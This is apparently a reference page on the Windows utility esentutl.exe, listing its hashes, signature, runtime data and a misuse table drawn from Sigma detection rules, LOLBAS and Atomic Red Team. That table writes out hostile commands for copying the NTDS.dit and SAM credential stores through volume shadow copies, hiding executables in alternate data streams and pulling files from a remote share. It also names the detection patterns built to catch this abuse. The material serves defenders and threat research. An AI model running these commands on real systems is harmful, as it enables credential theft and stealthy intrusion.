esentutl.exe

  • File Path: C:\WINDOWS\SysWOW64\esentutl.exe
  • Description: Extensible Storage Engine Utilities for Microsoft(R) Windows(R)

Hashes

Type Hash
MD5 D5BFB83F73604AC0D571E972D25604D7
SHA1 2DB485A1219BFE5A806F9F497B661097BA99ED07
SHA256 954AAA329E4225E0A83F36F96DAA5B7B418BD6207F8DF7231BA8CE75E5996CD9
SHA384 5C6E9C441B2F5C8C575EAA957F7BCF3A12E9BB4BC4127AEAFC6E276DD823E8B7545ED159A39C77002367BD72986EF9DC
SHA512 8B54AB3518EA3EFF0D4DAAA649BC4C10A5D0A88009778AAEE39C0379E0AD2C5625AB9316D5C2DCEC8EC1220208AA82ECA35EEF0C7ECB6E4C9FC6D099C92FBF14
SSDEEP 6144:UW2/ZZS+9itpvOghWPh612MAwqCgMqyY02SaXB+U5jMjArCk16imWqui2Amikbu8:SZZV9itpv9hWPZOJRTXS/EuMC
IMP 08A29170254C7CA52C81DD3D57316BA4
PESHA1 388B171C526AB29BBF2A48943392570A65504172
PE256 73C5E054276DB2FEC4A9B68B2DF3AF98B01CAF4F98EC08B554E56B770303A91E

Runtime Data

Child Processes:

conhost.exe

Open Handles:

Path Type
(RW-) C:\Windows File
(RW-) C:\Windows\SysWOW64 File
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro Section
\Sessions\2\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\Sessions\2\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section

Loaded Modules:

Path
C:\WINDOWS\SYSTEM32\ntdll.dll
C:\WINDOWS\System32\wow64.dll
C:\WINDOWS\System32\wow64base.dll
C:\WINDOWS\System32\wow64con.dll
C:\WINDOWS\System32\wow64cpu.dll
C:\WINDOWS\System32\wow64win.dll
C:\WINDOWS\SysWOW64\esentutl.exe

Signature

  • Status: Signature verified.
  • Serial: 33000002ED2C45E4C145CF48440000000002ED
  • Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: esentutl.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.22000.1 (WinBuild.160101.0800)
  • Product Version: 10.0.22000.1
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 32-bit

File Scan

  • VirusTotal Detections: 0/72
  • VirusTotal Link: https://www.virustotal.com/gui/file/954aaa329e4225e0a83f36f96daa5b7b418bd6207f8df7231ba8ce75e5996cd9/detection

Possible Misuse

The following table contains possible examples of esentutl.exe being misused. While esentutl.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma sysmon_suspicious_remote_thread.yml - '\esentutl.exe' DRL 1.0
sigma win_susp_esentutl_activity.yml title: Suspicious Esentutl Use DRL 1.0
sigma win_susp_esentutl_activity.yml description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - esentutl.exe /y /vss *\ntds.dit* DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - esentutl.exe /y /vss *\SAM DRL 1.0
sigma win_susp_vssadmin_ntds_activity.yml - esentutl.exe /y /vss *\SYSTEM DRL 1.0
sigma proc_creation_win_alternate_data_streams.yml - 'esentutl ' DRL 1.0
sigma proc_creation_win_copying_sensitive_files_with_credential_data.yml - https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ DRL 1.0
sigma proc_creation_win_copying_sensitive_files_with_credential_data.yml - Image\|endswith: '\esentutl.exe' DRL 1.0
sigma proc_creation_win_esentutl_webcache.yml title: Esentutl Steals Browser Information DRL 1.0
sigma proc_creation_win_esentutl_webcache.yml description: One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe DRL 1.0
sigma proc_creation_win_esentutl_webcache.yml Image\|endswith: \esentutl.exe DRL 1.0
sigma proc_creation_win_susp_esentutl_params.yml title: Esentutl Gather Credentials DRL 1.0
sigma proc_creation_win_susp_esentutl_params.yml description: Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. Trickbot also uses this utilities to get MSEdge info via its module pwgrab. DRL 1.0
sigma proc_creation_win_susp_esentutl_params.yml - 'esentutl' DRL 1.0
sigma registry_event_esentutl_volume_shadow_copy_service_keys.yml title: Esentutl Volume Shadow Copy Service Keys DRL 1.0
sigma registry_event_esentutl_volume_shadow_copy_service_keys.yml description: Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\System\\CurrentControlSet\\Services\\VSS\\Diag\\VolSnap\\Volume are captured. DRL 1.0
sigma registry_event_esentutl_volume_shadow_copy_service_keys.yml Image\|endswith: 'esentutl.exe' # limit esentutl as in references, too many FP to filter DRL 1.0
LOLBAS Esentutl.yml Name: Esentutl.exe  
LOLBAS Esentutl.yml - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o  
LOLBAS Esentutl.yml - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit  
LOLBAS Esentutl.yml - Path: C:\Windows\System32\esentutl.exe  
LOLBAS Esentutl.yml - Path: C:\Windows\SysWOW64\esentutl.exe  
LOLBAS Esentutl.yml - Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/  
atomic-red-team index.md - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows] MIT License. © 2018 Red Canary
atomic-red-team index.md - Atomic Test #3: esentutl.exe SAM copy [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #3: esentutl.exe SAM copy [windows] MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md - Atomic Test #3 - esentutl.exe SAM copy MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md ## Atomic Test #3 - esentutl.exe SAM copy MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md Copy the SAM hive using the esentutl.exe utility MIT License. © 2018 Red Canary
atomic-red-team T1003.002.md esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md - Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md ## Atomic Test #6 - Create Volume Shadow Copy remotely (WMI) with esentutl MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy created with esentutl. MIT License. © 2018 Red Canary
atomic-red-team T1003.003.md wmic /node:”#{target_host}” process call create “cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}” MIT License. © 2018 Red Canary
atomic-red-team T1564.004.md esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.